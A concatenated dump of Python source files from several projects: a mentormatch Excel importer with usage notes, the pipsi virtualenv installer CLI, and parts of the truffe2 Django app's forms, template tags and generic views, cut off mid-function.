from .importer_implementation_excel_schema import fieldschemas, favor
from .importer_abc import Importer
from mentormatch.utils.exceptions import MentormatchError
import mentormatch.utils as utils
from typing import Dict, List, TYPE_CHECKING
class ImporterExcel(Importer):
def __init__(self, path):
self._path = path
def execute(self) -> Dict[utils.ApplicantType, List[Dict]]:
# For this to work, there needs to be one excel workbook with the following worksheets:
# mentor
# mentee
# favor
# --- get applications from excel -------------------------------------
all_applications: Dict[utils.ApplicantType, List[Dict]] = {}
for applicant_type, fieldpatterns in fieldschemas.items():
try:
applications = FuzzyTable(
path=self._path,
sheetname=applicant_type.name.lower(),
fields=fieldpatterns,
header_row=1,
name=applicant_type.name,
missingfieldserror_active=True,
)
except fe.MissingFieldError as e: # pragma: no cover
                msg = str(e) + "\nMake sure your headers are in row 1."

raise MentormatchError(msg)
except fe.FuzzyTableError as e: # pragma: no cover
raise MentormatchError(str(e))
application_list = []
locs_and_genders = utils.ApplicationSchema.get_locations_and_genders()
for record in applications.records:
application = dict(record)
application.update({
val.get_preference_key(): []
for val in utils.YesNoMaybe
})
for loc_or_gender in locs_and_genders: # e.g. 'horsham'
pref_str = application.pop(loc_or_gender) # e.g. 'no'
pref_key = utils.YesNoMaybe.get_enum(pref_str).get_preference_key() # e.g. 'preference_no'
application[pref_key].append(loc_or_gender)
application_list.append(application)
all_applications[applicant_type] = application_list
# --- get "favored" status for mentees --------------------------------
try:
favored_mentees = FuzzyTable(
path=self._path,
sheetname='favor',
fields=favor,
name='favored_mentees',
approximate_match=False,
missingfieldserror_active=True,
)
except fe.FuzzyTableError as e: # pragma: no cover
raise MentormatchError(str(e))
favored_mentees = {
mentee['wwid']: mentee['favor']
for mentee in favored_mentees.records
}
for mentee in all_applications[utils.ApplicantType.MENTEE]:
wwid = mentee['wwid']
favor_val = favored_mentees.get(wwid, 0)
mentee['favor'] = favor_val
# --- return applications ---------------------------------------------
return all_applications
```
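The comment at the top of `execute()` spells out the expected input: one workbook containing `mentor`, `mentee` and `favor` worksheets with headers in row 1. A minimal invocation sketch (the filename is borrowed from the test further down, and the import path is assumed from the package layout):
```python
from mentormatch.importer.importer_implementation_excel import ImporterExcel
import mentormatch.utils as utils
importer = ImporterExcel('applications.xlsx')   # workbook with mentor / mentee / favor sheets
applications = importer.execute()               # Dict[ApplicantType, List[Dict]]
mentees = applications[utils.ApplicantType.MENTEE]
# Each mentee dict now carries a 'favor' level, defaulting to 0 when the
# mentee is absent from the favor worksheet.
print(len(mentees), mentees[0]['favor'] if mentees else None)
```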
#### File: mentormatch/importer/util.py
```python
import tkinter as tk
from pathlib import Path
from tkinter import filedialog
# --- Third Party Imports -----------------------------------------------------
# None
# --- Intra-Package Imports ---------------------------------------------------
# None
def get_path(): # pragma: no cover
root = tk.Tk()
root.withdraw()
path = Path(filedialog.askopenfilename())
return path
```
#### File: mentormatch/tests/test_import.py
```python
from mentormatch.importer import ImporterFactory
def test_import(test_files_dir, home_dir):
test_file_path = test_files_dir / 'applications.xlsx'
exporter_factory = ImporterFactory
importer = exporter_factory.get_excel_importer(
source_path=test_file_path,
)
importer.execute()
# def test_generate_names(test_files_dir):
#
# # Generate Names
# name_count = 200
# _names = {}
# for gender in 'male female'.split():
# _names[f'first_names_{gender}'] = [
# names.get_first_name(gender=gender)
# for _ in range(name_count)
# ]
# _names['last_names'] = [
# names.get_last_name()
# for _ in range(name_count * 2)
# ]
#
# # Save to file
# test_file_path = test_files_dir / 'names.toml'
# test_file_path.write_text(toml.dumps(_names))
#
# def test_toml(test_files_dir):
# import toml
# _d = {
# 'happy': 'a',
# 'fdsafdsa': 'b',
# }
#
# path = test_files_dir / 'myfile.toml'
# path.write_text(toml.dumps(_d))
``` |
{
"source": "jonathanchu/pipsi",
"score": 2
} |
#### File: jonathanchu/pipsi/pipsi.py
```python
import os
import sys
import shutil
from urlparse import urlparse
import click
from pkg_resources import safe_name
def normalize_package(value):
# Strips the version and normalizes name
return str(safe_name(value.strip().split('=')[0]).lower())
def real_readlink(filename):
try:
target = os.readlink(filename)
except (OSError, IOError):
return None
return os.path.normpath(os.path.realpath(
os.path.join(os.path.dirname(filename), target)))
class UninstallInfo(object):
def __init__(self, package, paths=None, installed=True):
self.package = package
self.paths = paths or []
self.installed = installed
def perform(self):
for path in self.paths:
try:
os.remove(path)
except OSError:
shutil.rmtree(path)
class Repo(object):
def __init__(self):
self.home = os.path.expanduser('~/.local/venvs')
self.bin_dir = os.path.expanduser('~/.local/bin')
def resolve_package(self, spec, python=None):
url = urlparse(spec)
if url.netloc == 'file':
location = url.path
elif url.netloc != '':
if not url.fragment.startswith('egg='):
raise click.UsageError('When installing from URLs you need '
'to add an egg at the end. For '
'instance git+https://.../#egg=Foo')
return url.fragment[4:], [spec]
elif os.path.isdir(spec):
location = spec
else:
return spec, [spec]
from subprocess import Popen, PIPE
p = Popen([python or sys.executable, 'setup.py', '--name'],
stdout=PIPE, stderr=PIPE, cwd=location)
name = p.communicate()[0].strip()
if p.returncode != 0:
raise click.UsageError('%s does not appear to be a local '
'Python package.' % spec)
return name.strip(), [location]
def get_package_path(self, package):
return os.path.join(self.home, normalize_package(package))
def find_installed_executables(self, path):
prefix = os.path.realpath(os.path.normpath(path)) + '/'
try:
for filename in os.listdir(self.bin_dir):
exe = os.path.join(self.bin_dir, filename)
target = real_readlink(exe)
if target is None:
continue
if target.startswith(prefix):
yield exe
except OSError:
pass
def find_scripts(self, virtualenv, package):
prefix = os.path.normpath(os.path.realpath(os.path.join(
virtualenv, 'bin'))) + '/'
from subprocess import Popen, PIPE
files = Popen([prefix + 'python', '-c', r'''if 1:
import os
import pkg_resources
dist = pkg_resources.get_distribution(%(pkg)r)
if dist.has_metadata('RECORD'):
for line in dist.get_metadata_lines('RECORD'):
print(line.split(',')[0])
elif dist.has_metadata('installed-files.txt'):
for line in dist.get_metadata_lines('installed-files.txt'):
print(os.path.join(dist.egg_info, line.split(',')[0]))
elif dist.has_metadata('entry_points.txt'):
try:
from ConfigParser import SafeConfigParser
from StringIO import StringIO
except ImportError:
from configparser import SafeConfigParser
from io import StringIO
parser = SafeConfigParser()
parser.readfp(StringIO(
'\n'.join(dist.get_metadata_lines('entry_points.txt'))))
if parser.has_section('console_scripts'):
for name, _ in parser.items('console_scripts'):
print os.path.join(%(prefix)r, name)
''' % {'pkg': package, 'prefix': prefix}],
stdout=PIPE).communicate()[0].splitlines()
for filename in files:
filename = os.path.normpath(os.path.realpath(filename))
if os.path.isfile(filename) and \
filename.startswith(prefix) and \
os.access(filename, os.X_OK):
yield filename
def link_scripts(self, scripts):
rv = []
for script in scripts:
script_dst = os.path.join(
self.bin_dir, os.path.basename(script))
old_target = real_readlink(script_dst)
if old_target == script:
continue
try:
os.remove(script_dst)
except OSError:
pass
try:
os.symlink(script, script_dst)
except OSError:
pass
else:
click.echo(' Linked script %s' % script_dst)
rv.append((script, script_dst))
return rv
def install(self, package, python=None, editable=False):
package, install_args = self.resolve_package(package, python)
venv_path = self.get_package_path(package)
if os.path.isdir(venv_path):
click.echo('%s is already installed' % package)
return
if not os.path.exists(self.bin_dir):
os.makedirs(self.bin_dir)
from subprocess import Popen
def _cleanup():
try:
shutil.rmtree(venv_path)
except (OSError, IOError):
pass
return False
# Install virtualenv
args = ['virtualenv']
if python is not None:
args.append('-p')
args.append(python)
args.append(venv_path)
try:
if Popen(args).wait() != 0:
click.echo('Failed to create virtualenv. Aborting.')
return _cleanup()
args = [os.path.join(venv_path, 'bin', 'pip'), 'install']
if editable:
args.append('--editable')
if Popen(args + install_args).wait() != 0:
click.echo('Failed to pip install. Aborting.')
return _cleanup()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
_cleanup()
raise exc_type, exc_value, tb
# Find all the scripts
scripts = self.find_scripts(venv_path, package)
# And link them
linked_scripts = self.link_scripts(scripts)
# We did not link any, rollback.
if not linked_scripts:
click.echo('Did not find any scripts. Uninstalling.')
return _cleanup()
return True
def uninstall(self, package):
path = self.get_package_path(package)
if not os.path.isdir(path):
return UninstallInfo(package, installed=False)
paths = [path]
paths.extend(self.find_installed_executables(path))
return UninstallInfo(package, paths)
def upgrade(self, package, editable=False):
package, install_args = self.resolve_package(package)
venv_path = self.get_package_path(package)
if not os.path.isdir(venv_path):
click.echo('%s is not installed' % package)
return
from subprocess import Popen
old_scripts = set(self.find_scripts(venv_path, package))
args = [os.path.join(venv_path, 'bin', 'pip'), 'install',
'--upgrade']
if editable:
args.append('--editable')
if Popen(args + install_args).wait() != 0:
click.echo('Failed to upgrade through pip. Aborting.')
return
scripts = self.find_scripts(venv_path, package)
linked_scripts = self.link_scripts(scripts)
to_delete = old_scripts - set(x[0] for x in linked_scripts)
for script_src, script_link in linked_scripts:
if script_src in to_delete:
try:
click.echo(' Removing old script %s' % script_src)
os.remove(script_link)
except (IOError, OSError):
pass
def list_everything(self):
venvs = {}
for venv in os.listdir(self.home):
venv_path = os.path.join(self.home, venv)
if os.path.isdir(venv_path) and \
os.path.isfile(venv_path + '/bin/python'):
venvs[venv] = []
def _find_venv(target):
for venv in venvs:
if target.startswith(os.path.join(self.home, venv) + '/'):
return venv
for script in os.listdir(self.bin_dir):
exe = os.path.join(self.bin_dir, script)
target = real_readlink(exe)
if target is None:
continue
venv = _find_venv(target)
if venv is not None:
venvs[venv].append(script)
return sorted(venvs.items())
pass_repo = click.make_pass_decorator(Repo, ensure=True)
@click.group()
@click.option('--home', type=click.Path(), default=None,
help='The folder that contains the virtualenvs.')
@click.option('--bin-dir', type=click.Path(), default=None,
help='The path where the scripts are symlinked to.')
@click.version_option()
@pass_repo
def cli(repo, home, bin_dir):
"""pipsi is a tool that uses virtualenv and pip to install shell
tools that are separated from each other.
"""
if home is not None:
repo.home = home
if bin_dir is not None:
repo.bin_dir = bin_dir
@cli.command()
@click.argument('package')
@click.option('--python', default=None,
help='The python interpreter to use.')
@click.option('--editable', is_flag=True,
help='Enable editable installation. This only works for '
'locally installed packages.')
@pass_repo
def install(repo, package, python, editable):
"""Installs scripts from a Python package.
Given a package this will install all the scripts and their dependencies
of the given Python package into a new virtualenv and symlinks the
discovered scripts into BIN_DIR (defaults to ~/.local/bin).
"""
if repo.install(package, python, editable):
click.echo('Done.')
@cli.command()
@click.argument('package')
@click.option('--editable', is_flag=True,
help='Enable editable installation. This only works for '
'locally installed packages.')
@pass_repo
def upgrade(repo, package, editable):
"""Upgrades an already installed package."""
if repo.upgrade(package, editable):
click.echo('Done.')
@cli.command(short_help='Uninstalls scripts of a package.')
@click.argument('package')
@click.option('--yes', is_flag=True, help='Skips all prompts.')
@pass_repo
def uninstall(repo, package, yes):
"""Uninstalls all scripts of a Python package and cleans up the
virtualenv.
"""
uinfo = repo.uninstall(package)
if not uinfo.installed:
click.echo('%s is not installed' % package)
else:
click.echo('The following paths will be removed:')
for path in uinfo.paths:
click.echo(' %s' % click.format_filename(path))
click.echo()
if yes or click.confirm('Do you want to uninstall %s?' % package):
uinfo.perform()
click.echo('Done!')
else:
click.echo('Aborted!')
@cli.command('list')
@pass_repo
def list_cmd(repo):
"""Lists all scripts installed through pipsi."""
click.echo('Packages and scripts installed through pipsi:')
for venv, scripts in repo.list_everything():
if not scripts:
continue
click.echo(' Package "%s":' % venv)
for script in scripts:
click.echo(' ' + script)
``` |
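pipsi is normally driven through the click CLI defined above (`pipsi install`, `pipsi upgrade`, `pipsi uninstall`, `pipsi list`), but the `Repo` class can also be exercised directly. A hypothetical sketch: the package name is just an example, the paths shown are the class defaults, and this vintage of the code targets Python 2.
```python
import os
from pipsi import Repo
repo = Repo()
repo.home = os.path.expanduser('~/.local/venvs')   # default, shown for clarity
repo.bin_dir = os.path.expanduser('~/.local/bin')  # default, shown for clarity
# Creates ~/.local/venvs/flask, pip-installs the package and symlinks its scripts.
if repo.install('Flask'):
    print('installed')
for venv, scripts in repo.list_everything():
    print(venv, scripts)
uinfo = repo.uninstall('Flask')
if uinfo.installed:
    uinfo.perform()  # removes the virtualenv and the linked scripts
```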
{
"source": "JonathanCollaud/truffe2",
"score": 2
} |
#### File: truffe2/communication/forms2.py
```python
from django.forms import ModelForm
from django.utils.safestring import mark_safe
from django.utils.html import escape
from .models import DisplayReservationLine, Display
class DisplayReservationLineForm(ModelForm):
class Meta:
model = DisplayReservationLine
exclude = ('display_reservation', 'order')
def __init__(self, *args, **kwargs):
super(DisplayReservationLineForm, self).__init__(*args, **kwargs)
self.fields['display'].queryset = Display.objects.filter(active=True, deleted=False).order_by('unit__name', 'title')
self.fields['display'].label_from_instance = lambda obj: mark_safe(u"[{}] {}".format(escape(obj.unit), escape(obj.title)))
```
#### File: truffe2/generic/startup.py
```python
from generic.models import GenericModel, GenericStateModel
def startup():
"""Create urls, models and cie at startup"""
GenericModel.startup()
```
#### File: generic/templatetags/generic_extras.py
```python
from django import template
from django.utils.safestring import mark_safe
import bleach
from bleach.sanitizer import BleachSanitizer
from bleach.encoding import force_unicode
from bootstrap3.renderers import FieldRenderer
from bootstrap3.text import text_value
import html5lib
import re
register = template.Library()
pos = [(0, 0), (1, 0), (0, 1), (2, 3), (1, 2), (2, 1), (2, 2)]
re_spaceless = re.compile("(\n|\r)+")
@register.filter
def node_x(value):
x, _ = pos[value]
return x
@register.filter
def node_y(value):
_, y = pos[value]
return y
@register.filter
def get_attr(value, arg):
v = getattr(value, arg, None)
if hasattr(v, '__call__'):
v = v()
elif isinstance(value, dict):
v = value.get(arg)
if v is None:
return ''
return v
@register.filter
def call(obj, methodName):
method = getattr(obj, methodName)
if "__callArg" in obj.__dict__:
ret = method(*obj.__callArg)
del obj.__callArg
return ret
return method()
@register.filter
def args(obj, arg):
if "__callArg" not in obj.__dict__:
obj.__callArg = []
obj.__callArg += [arg]
return obj
@register.filter
def get_class(value):
return value.__class__.__name__
@register.filter
def is_new_for(obj, user):
return obj.is_new(user)
@register.simple_tag(takes_context=True)
def switchable(context, obj, user, id):
return 'true' if obj.may_switch_to(user, id) else 'false'
@register.assignment_tag(takes_context=True)
def get_list_quick_switch(context, obj):
if hasattr(obj.MetaState, 'list_quick_switch'):
return filter(lambda (status, __, ___): obj.may_switch_to(context['user'], status), obj.MetaState.list_quick_switch.get(obj.status, []))
@register.assignment_tag(takes_context=True)
def get_states_quick_switch(context, obj):
if hasattr(obj.MetaState, 'states_quick_switch'):
return filter(lambda (status, __): obj.may_switch_to(context['user'], status), obj.MetaState.states_quick_switch.get(obj.status, []))
@register.tag
def nocrlf(parser, token):
nodelist = parser.parse(('endnocrlf',))
parser.delete_first_token()
return CrlfNode(nodelist)
class CrlfNode(template.Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
rendered = self.nodelist.render(context).strip()
return re_spaceless.sub("", rendered)
@register.filter
def html_check_and_safe(value):
tags = bleach.ALLOWED_TAGS + ['div', 'br', 'font', 'p', 'table', 'tr', 'td', 'th', 'img', 'u', 'span', 'tbody', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'hr']
attrs = {
'*': ['class', 'style', 'color', 'align', 'title', 'data-toggle', 'data-placement'],
'a': ['href', 'rel'],
'img': ['src', 'alt'],
}
style = ['line-height', 'background-color', 'font-size', 'margin-top']
text = force_unicode(value)
class s(BleachSanitizer):
allowed_elements = tags
allowed_attributes = attrs
allowed_css_properties = style
strip_disallowed_elements = True
strip_html_comments = True
allowed_protocols = ['http', 'https', 'data']
parser = html5lib.HTMLParser(tokenizer=s)
return mark_safe(bleach._render(parser.parseFragment(text)))
class SimpleFieldRenderer(FieldRenderer):
def render(self):
# See if we're not excluded
if self.field.name in self.exclude.replace(' ', '').split(','):
return ''
# Hidden input requires no special treatment
if self.field.is_hidden:
return text_value(self.field)
# Render the widget
self.add_widget_attrs()
html = self.field.as_widget(attrs=self.widget.attrs)
self.restore_widget_attrs()
# Start post render
html = self.post_widget_render(html)
html = self.wrap_widget(html)
html = self.make_input_group(html)
html = self.append_to_field(html)
html = self.wrap_field(html)
return html
@register.simple_tag()
def simple_bootstrap_field(field):
return SimpleFieldRenderer(field).render()
```
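Although registered as Django template filters, the functions above are plain callables, so their behaviour can be sketched directly in Python. The `Demo` class is purely illustrative; in a template the `args`/`call` pair would presumably be chained as `{{ obj|args:"world"|call:"hello" }}`.
```python
from generic.templatetags.generic_extras import get_attr, call, args, node_x, node_y  # assumes the Django project is importable
class Demo(object):
    name = 'truffe'
    def hello(self, who):
        return 'hello ' + who
obj = Demo()
print(get_attr(obj, 'name'))              # 'truffe' (attribute lookup)
print(get_attr({'x': 1}, 'x'))            # 1 (falls back to dict lookup)
print(call(args(obj, 'world'), 'hello'))  # 'hello world'
print(node_x(3), node_y(3))               # the (2, 3) entry of the pos table
```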
#### File: truffe2/generic/views.py
```python
from django.shortcuts import get_object_or_404, render, redirect
from django.views.decorators.csrf import csrf_exempt
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from django.db.models import Max, Q
from easy_thumbnails.files import get_thumbnailer
from jfu.http import upload_receive, UploadResponse, JFUResponse
import json
import datetime
import pytz
import uuid
import os
from sendfile import sendfile
import importlib
import copy
import inspect
import urllib
from wand.image import Image
from accounting_core.utils import CostCenterLinked
from generic.datatables import generic_list_json
from generic.forms import ContactForm
from app.utils import update_current_unit, get_current_unit, update_current_year, get_current_year, send_templated_mail, has_property, set_property
from rights.utils import BasicRightModel
def get_unit_data(model_class, request, allow_blank=True, allow_all_units=False):
from generic.models import GenericExternalUnitAllowed
unit_mode = hasattr(model_class.MetaData, 'has_unit') and model_class.MetaData.has_unit
unit_blank = allow_blank and unit_mode and issubclass(model_class, GenericExternalUnitAllowed)
current_unit = None
if unit_mode:
if request.GET.get('upk'):
update_current_unit(request, request.GET.get('upk'))
if request.POST.get('upk'):
update_current_unit(request, request.POST.get('upk'))
current_unit = get_current_unit(request, unit_blank, allow_all_units)
if current_unit and current_unit.is_hidden:
            # Prevents clever users from cheating by setting the IDs by hand
if not current_unit.check_if_can_use_hidden(request.user):
raise Http404
return unit_mode, current_unit, unit_blank
def get_year_data(model_class, request):
from accounting_core.utils import AccountingYearLinked
from accounting_core.models import AccountingYear
year_mode = issubclass(model_class, AccountingYearLinked)
current_year = None
if year_mode:
if request.GET.get('ypk'):
update_current_year(request, request.GET.get('ypk'))
if request.POST.get('ypk'):
update_current_year(request, request.POST.get('ypk'))
current_year = get_current_year(request)
return year_mode, current_year, AccountingYear
def generate_generic_list(module, base_name, model_class, json_view_suffix, right_to_check, right_to_check_edit, template_to_use, allow_blank, object_filter=False, bonus_args_transformator=None, tag_class=None, allow_all_units=False):
@login_required
def _generic_generic_list(request, **bonus_args):
json_view = '%s.views.%s%s' % (module.__name__, base_name, json_view_suffix)
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
deleted_view = '%s.views.%s_deleted' % (module.__name__, base_name)
status_view = '%s.views.%s_switch_status' % (module.__name__, base_name)
logs_view = '%s.views.%s_logs' % (module.__name__, base_name)
tag_search_view = '%s.views.%s_tag_search' % (module.__name__, base_name)
mayi_view = '%s.views.%s_mayi' % (module.__name__, base_name)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_blank=allow_blank, allow_all_units=allow_all_units)
main_unit = None
allow_all_units_ = allow_all_units # Need a local copy
if unit_mode:
# Remove upk in urls (unit has been changed)
if 'upk' in request.GET:
get_params = dict(request.GET.iterlists())
del get_params['upk']
return HttpResponseRedirect('{}?{}'.format(request.path, urllib.urlencode(get_params)))
from units.models import Unit
main_unit = Unit.objects.get(pk=settings.ROOT_UNIT_PK)
main_unit.set_rights_can_select(lambda unit: model_class.static_rights_can(right_to_check, request.user, unit, current_year))
main_unit.set_rights_can_edit(lambda unit: model_class.static_rights_can(right_to_check_edit, request.user, unit, current_year))
main_unit.check_if_can_use_hidden(request.user)
allow_all_units_ = allow_all_units and model_class.static_rights_can(right_to_check, request.user, main_unit, current_year)
else:
            # The LIST right is not verified here if we're in unit mode. We
            # need to test (in the view) whether another unit is available for
            # LIST if the current unit isn't!
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can(right_to_check, request.user, current_unit, current_year):
raise Http404
if hasattr(model_class, 'moderable_object') and model_class.moderable_object: # If the object is moderable, list all moderable things by the current user
            # List all moderables in the 'todo' state
moderables = model_class.objects.filter(status=model_class.moderable_state).exclude(deleted=True)
# Filter to check if user has rights
moderables = filter(lambda m: m.rights_can('VALIDATE', request.user), moderables)
else:
moderables = False
if object_filter and hasattr(model_class, 'get_linked_object_class'):
objects = model_class.get_linked_object_class().objects.filter(unit=current_unit)
else:
objects = []
if bonus_args_transformator:
extra_data = bonus_args_transformator(request, **bonus_args) or {}
else:
extra_data = {}
data = {
'Model': model_class, 'json_view': json_view, 'edit_view': edit_view, 'deleted_view': deleted_view, 'show_view': show_view, 'status_view': status_view, 'logs_view': logs_view, 'tag_search_view': tag_search_view, 'mayi_view': mayi_view,
'unit_mode': unit_mode, 'main_unit': main_unit, 'unit_blank': unit_blank, 'allow_all_units': allow_all_units_,
'year_mode': year_mode, 'years_available': AccountingYear.build_year_menu('LIST', request.user),
'moderables': moderables, 'object_filter': objects, 'tag_mode': tag_class is not None, 'tag': request.GET.get('tag', ''),
}
data.update(extra_data)
if hasattr(model_class.MetaData, 'extra_args_for_list'):
data.update(model_class.MetaData.extra_args_for_list(request, current_unit, current_year))
return render(request, ['%s/%s/%s.html' % (module.__name__, base_name, template_to_use,), 'generic/generic/%s.html' % (template_to_use,)], data)
return _generic_generic_list
def generate_list(module, base_name, model_class, tag_class):
return generate_generic_list(module, base_name, model_class, '_list_json', 'LIST', 'CREATE', 'list', True, tag_class=tag_class, allow_all_units=True)
def generate_list_json(module, base_name, model_class, tag_class):
@login_required
@csrf_exempt
def _generic_list_json(request):
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
delete_view = '%s.views.%s_delete' % (module.__name__, base_name)
logs_view = '%s.views.%s_logs' % (module.__name__, base_name)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_all_units=True)
if unit_mode:
from units.models import Unit
main_unit = Unit.objects.get(pk=settings.ROOT_UNIT_PK)
all_units_mode = unit_mode and current_unit and current_unit.pk == -2
if all_units_mode:
unit_to_check = main_unit
else:
unit_to_check = current_unit
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('LIST', request.user, unit_to_check, current_year):
raise Http404
if unit_mode and not all_units_mode:
if not current_unit:
if request.user.is_superuser or model_class.static_rights_can('LIST', request.user, main_unit, current_year): # Never filter
filter_ = lambda x: x.filter(unit=None)
else:
filter_ = lambda x: x.filter(unit=None, unit_blank_user=request.user)
else:
if hasattr(model_class.MetaData, 'costcenterlinked') and model_class.MetaData.costcenterlinked:
filter_ = lambda x: x.filter(Q(costcenter__deleted=False) & (Q(costcenter__unit=current_unit) | (Q(costcenter__unit__parent_hierarchique=current_unit) & Q(costcenter__unit__is_commission=False))))
else:
filter_ = lambda x: x.filter(unit=current_unit)
else:
filter_ = lambda x: x
if year_mode:
filter__ = lambda x: filter_(x).filter(accounting_year=current_year)
else:
filter__ = filter_
if hasattr(model_class.MetaData, 'extra_filter_for_list'):
filter___ = model_class.MetaData.extra_filter_for_list(request, unit_to_check, current_year, filter__)
else:
filter___ = filter__
tag = request.GET.get('tag')
if tag_class and tag:
filter____ = lambda x: filter___(x).filter(tags__tag=tag).distinct()
else:
filter____ = filter___
return generic_list_json(request, model_class, [col for (col, disp) in model_class.MetaData.list_display] + ['pk'], [module.__name__ + '/' + base_name + '/list_json.html', 'generic/generic/list_json.html'],
{'Model': model_class,
'show_view': show_view,
'edit_view': edit_view,
'delete_view': delete_view,
'logs_view': logs_view,
'list_display': model_class.MetaData.list_display,
'all_units_mode': all_units_mode,
},
True, model_class.MetaData.filter_fields,
bonus_filter_function=filter____,
selector_column=True,
bonus_total_filter_function=filter___,
)
return _generic_list_json
def generate_list_related(module, base_name, model_class):
return generate_generic_list(module, base_name, model_class, '_list_related_json', 'VALIDATE', 'VALIDATE', 'list_related', False, True)
def generate_list_related_json(module, base_name, model_class):
@login_required
@csrf_exempt
def _generate_list_related_json(request):
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
delete_view = '%s.views.%s_delete' % (module.__name__, base_name)
logs_view = '%s.views.%s_logs' % (module.__name__, base_name)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_blank=False)
if unit_mode:
if hasattr(model_class.MetaState, 'filter_unit_field'):
filter_ = lambda x: x.filter(**{model_class.MetaState.filter_unit_field.replace('.', '__'): current_unit}).distinct()
else:
filter_ = lambda x: x.filter(**{model_class.MetaState.unit_field.replace('.', '__'): current_unit}).distinct()
else:
filter_ = lambda x: x.distinct()
if year_mode:
filter__ = lambda x: filter_(x).filter(accounting_year=current_year)
else:
filter__ = filter_
def filter_object(qs, request):
if request.POST.get('sSearch_0'):
if hasattr(model_class.MetaState, 'filter_unit_field'):
return qs.filter(**{'__'.join(model_class.MetaState.filter_unit_field.split('.')[:-1] + ['pk']): request.POST.get('sSearch_0'), model_class.MetaState.filter_unit_field.replace('.', '__'): current_unit})
else:
return qs.filter(**{'__'.join(model_class.MetaState.unit_field.split('.')[:-1] + ['pk']): request.POST.get('sSearch_0'), model_class.MetaState.unit_field.replace('.', '__'): current_unit})
else:
return qs
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('VALIDATE', request.user, current_unit, current_year):
raise Http404
return generic_list_json(request, model_class, [col for (col, disp) in model_class.MetaData.list_display_related] + ['pk'], [module.__name__ + '/' + base_name + '/list_related_json.html', 'generic/generic/list_related_json.html'],
{'Model': model_class,
'show_view': show_view,
'edit_view': edit_view,
'delete_view': delete_view,
'logs_view': logs_view,
'list_display': model_class.MetaData.list_display_related,
'upk_noswitch': True, 'from_related': True,
},
True, model_class.MetaData.filter_fields,
bonus_filter_function=filter__,
bonus_filter_function_with_parameters=filter_object,
deca_one_status=True,
selector_column=True,
)
return _generate_list_related_json
def generate_edit(module, base_name, model_class, form_class, log_class, file_class, tag_class):
from accounting_tools.models import LinkedInfo
@login_required
def _generic_edit(request, pk):
list_view = '%s.views.%s_list' % (module.__name__, base_name)
list_related_view = '%s.views.%s_list_related' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
file_upload_view = '%s.views.%s_file_upload' % (module.__name__, base_name)
file_delete_view = '%s.views.%s_file_delete' % (module.__name__, base_name)
file_get_view = '%s.views.%s_file_get' % (module.__name__, base_name)
file_get_thumbnail_view = '%s.views.%s_file_get_thumbnail' % (module.__name__, base_name)
tag_search_view = '%s.views.%s_tag_search' % (module.__name__, base_name)
related_mode = request.GET.get('_fromrelated') == '_'
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
extra_args = {}
try:
obj = model_class.objects.get(pk=pk, deleted=False)
if unit_mode:
obj_unit = obj.costcenter.unit if isinstance(obj, CostCenterLinked) else obj.unit
update_current_unit(request, obj_unit.pk if obj_unit else -1)
current_unit = obj_unit
if year_mode:
update_current_year(request, obj.accounting_year.pk)
current_year = obj.accounting_year
if isinstance(obj, BasicRightModel) and not obj.rights_can('EDIT', request.user):
raise Http404
except (ValueError, model_class.DoesNotExist):
obj = model_class()
if hasattr(model_class, 'MetaEdit') and hasattr(model_class.MetaEdit, 'set_extra_defaults'):
model_class.MetaEdit.set_extra_defaults(obj, request)
if unit_mode:
if unit_blank and not current_unit:
obj.unit_blank_user = request.user
if has_property(obj, 'MetaData.costcenterlinked') and obj.MetaData.costcenterlinked and current_unit.costcenter_set.first():
obj.costcenter = current_unit.costcenter_set.first()
if has_property(obj, obj.MetaRights.linked_unit_property):
set_property(obj, obj.MetaRights.linked_unit_property, current_unit)
else:
obj.unit = current_unit
if year_mode:
                # Are we about to try to create something in an accounting
                # year where that isn't possible?
if current_year not in AccountingYear.build_year_menu('CREATE', request.user):
update_current_year(request, None)
___, current_year, ___ = get_year_data(model_class, request)
obj.accounting_year = current_year
if unit_mode and isinstance(obj, BasicRightModel) and not obj.rights_can('CREATE', request.user) and current_unit:
                # Try to find a suitable unit, since the user may reach this
                # page without using a create button (which would have
                # switched the unit)
from units.models import Unit
for test_unit in Unit.objects.order_by('?'):
if has_property(obj, obj.MetaRights.linked_unit_property):
set_property(obj, obj.MetaRights.linked_unit_property, test_unit)
else:
obj.unit = test_unit
if obj.rights_can('CREATE', request.user):
current_unit = test_unit
break
# Set the original (or new) unit
if has_property(obj, obj.MetaRights.linked_unit_property):
set_property(obj, obj.MetaRights.linked_unit_property, current_unit)
else:
obj.unit = current_unit
if isinstance(obj, BasicRightModel) and not obj.rights_can('CREATE', request.user):
raise Http404
if unit_mode:
from units.models import Unit
main_unit = Unit.objects.get(pk=settings.ROOT_UNIT_PK)
main_unit.set_rights_can_select(lambda unit: model_class.static_rights_can('CREATE', request.user, unit, current_year))
main_unit.set_rights_can_edit(lambda unit: model_class.static_rights_can('CREATE', request.user, unit, current_year))
main_unit.check_if_can_use_hidden(request.user)
else:
main_unit = None
if obj.pk:
before_data = obj.build_state()
else:
before_data = None
file_mode = file_class is not None
file_key = None # Will be set later
from generic.models import GenericModelWithLines
lines_objects = []
if issubclass(model_class, GenericModelWithLines):
